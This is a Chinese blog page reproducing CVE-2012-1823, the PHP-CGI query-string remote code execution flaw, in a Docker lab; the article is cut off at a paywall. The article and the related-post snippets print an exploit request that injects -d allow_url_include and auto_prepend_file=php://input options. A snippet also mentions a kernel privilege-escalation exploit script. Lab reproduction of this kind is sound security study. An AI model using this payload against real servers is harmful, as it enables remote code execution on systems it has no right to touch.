CVE-2012-1823漏洞复现

最新推荐文章于 2025-03-19 10:23:12 发布
原创 最新推荐文章于 2025-03-19 10:23:12 发布
· 656 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了CVE-2012-1823漏洞,该漏洞允许攻击者的querystring参数成为php-cgi的输入,导致代码执行。通过复现过程,包括CGI概念的解释,以及在特定环境中输入特定命令来触发漏洞,展示了漏洞的可行性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。

复现

在相应的漏洞环境中输入

docker-compose up -d

生成环境
访问:http://your-ip:8080
在这里插入图片描述
环境成功搭建了,接下了去复现。
访问http://your-ip:8080/index.php?-s
在这里插入图片描述
可以看到爆出了代码,证明漏洞存在的
抓包构造数据包

GET /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
H
最低0.47元/天 解锁文章
CVE-2012-1823
qq_53063436的博客
01-05 2226
CVE-2012-1823详细介绍 漏洞复现(靶场为ctfshow) 利用 http://url/index.php?-s 判断是否存在漏洞 若出现源码组存在 bp抓包按下面修改 POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2012-1823复现
hhiollk的博客
03-31 1146
PHP-CGI远程代码执行漏洞 这个古老的漏洞,其实就是用户请求的querystring被作为了php-cgi的参数,命令行参数不仅可以通过 #!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12php < 5.4.2mod方式...
漏洞复现之PHP-CVE-2012-1823
最新发布
2202_75658977的博客
03-19 619
usr/local/bin/php-cgi -d include_path=/path`的方式传入php-cgi,更可以通过querystring的方式传入。/usr/local/bin/php-cgi -d include_path=/path`的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。- `-c` 指定php.ini文件的位置。- `-h`和`-?
cve-2012-1823漏洞复现
m0_74402888的博客
04-28 879
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。cgi:它是一种协议。通过cgi协议,web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。
漏洞复现CVE-2012-1823(PHP-CGI远程代码执行)
ASD830的博客
06-18 830
发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823。得到index.php和info.php,使用cat命令查看一下index.php。提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下。接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令。发现info.php,直接访问/info.php。首先我们使用-s命令查看一下源代码。
phpcgi 代码执行 (CVE-2012-1823) 复现
m0_49936858的博客
08-22 645
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 1066
PHP-CGI远程代码执行漏洞CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
CVE-2012-1823 漏洞复现
Jay17的博客
02-10 1854
CVE-2012-1823 漏洞复现
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1473
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现
qq_29365787的博客
12-10 1418
一、漏洞介绍 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 影响范围: 漏洞影响版本 php < 5.3.12 or php < 5.4.2 PS:CVE-2012-1823是在php-cgi运行模式下出现的漏洞,其漏洞只出现在以cgi模式运行的php中 二、PHP运行的四种模式: 1)cgi 通用网关接口(
CVE-2012-1823(PHP-CGI远程代码执行)
浅笑996的博客
11-20 5015
基于vulhub漏洞环境: 安装vulhub漏洞环境 https://mp.csdn.net/mdeditor/84102101# CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 1.启动漏洞环境 进入 CVE-20...
PHP-CGI远程代码执行漏洞CVE-2012-1823
weixin_74149904的博客
10-21 1790
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。PHP-CGI远程代码执行漏洞CVE-2012-1823)分析。
漏洞复现CVE-2012-1823
2202_75658977的博客
03-19 634
usr/local/bin/php-cgi -d include_path=/path`的方式传入php-cgi,更可以通过querystring的方式传入。/usr/local/bin/php-cgi -d include_path=/path`的写法来进行测试,认为不应该限制php-cgi接受命令行参数,而且这个功能不和其他代码有任何冲突。- `-c` 指定php.ini文件的位置。- `-h`和`-?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值